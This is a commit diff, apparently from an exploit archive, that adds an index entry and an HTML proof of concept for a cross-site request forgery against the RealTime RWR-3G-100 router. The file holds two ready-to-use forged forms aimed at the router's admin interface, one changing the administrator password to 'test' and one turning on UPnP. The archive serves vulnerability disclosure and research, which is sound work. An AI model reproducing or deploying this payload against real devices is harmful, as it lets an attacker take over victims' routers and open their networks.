DB: 2017-08-14
1 new exploits RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)
This commit is contained in:
parent
89822ebf5d
commit
26466c9d62
2 changed files with 65 additions and 0 deletions
|
@ -38250,3 +38250,4 @@ id,file,description,date,author,platform,type,port
|
|||
42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
|
||||
42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
|
||||
42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
|
||||
42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
64
platforms/hardware/webapps/42449.html
Executable file
64
platforms/hardware/webapps/42449.html
Executable file
|
@ -0,0 +1,64 @@
|
|||
<!--
|
||||
# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
|
||||
(Change Admin Password)
|
||||
# Date: 13 Aug, 2017
|
||||
# Vendor Homepage : http://www.rtsindia.com/
|
||||
# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
|
||||
# Firmware Version : Ver1.0.56
|
||||
# Exploit Author: Touhid M.Shaikh
|
||||
# Contact: https://github.com/touhidshaikh
|
||||
# Website: http://touhidshaikh.com/
|
||||
|
||||
|
||||
===================
|
||||
Product Description
|
||||
===================
|
||||
Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
|
||||
Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
|
||||
Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
|
||||
connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
|
||||
Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
|
||||
Multiple Users to get connected to Broadband. Small & Sleek Portable
|
||||
Router, Easy to Install & Manage.
|
||||
-->
|
||||
|
||||
|
||||
|
||||
<!-- CHANGE ADMIN PASSWORD to test-->
|
||||
<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
|
||||
name="password">
|
||||
<input type="text" name="username" value="admin">
|
||||
<input type="password" name="newpass" value="test">
|
||||
<input type="password" name="confpass" value="test">
|
||||
<input type="hidden" value="/status.asp" name="submit-url">
|
||||
<input type="submit" value="Apply Changes" name="save">
|
||||
<input type="reset" value=" Reset " name="reset" id="password Reset">
|
||||
</form>
|
||||
<!-- CHANGE ADMIN PASSWORD Ends here-->
|
||||
|
||||
|
||||
<!---Enable The UPNP Service-->
|
||||
<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
|
||||
name="upnpSetup">
|
||||
<input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
|
||||
checked>
|
||||
<input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
|
||||
|
||||
<!--
|
||||
<input type="radio" name="avupnpfunction" id="avupnpfunctiony"
|
||||
value="yes" checked>
|
||||
<input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
|
||||
>
|
||||
-->
|
||||
<input type="submit" value="Apply Changes" name="save" id="upnp apply" >
|
||||
<input type="reset" value=" Reset " name="reset" id="upnp Reset">
|
||||
<input type="hidden" value="/upnp.asp" name="submit-url">
|
||||
</form>
|
||||
<!---Enable The UPNP Service Ends here-->
|
||||
|
||||
|
||||
|
||||
<!--
|
||||
======GREEtZ=====
|
||||
my cool Broo and Pratik K.tjani
|
||||
-->
|
Loading…
Add table
Reference in a new issue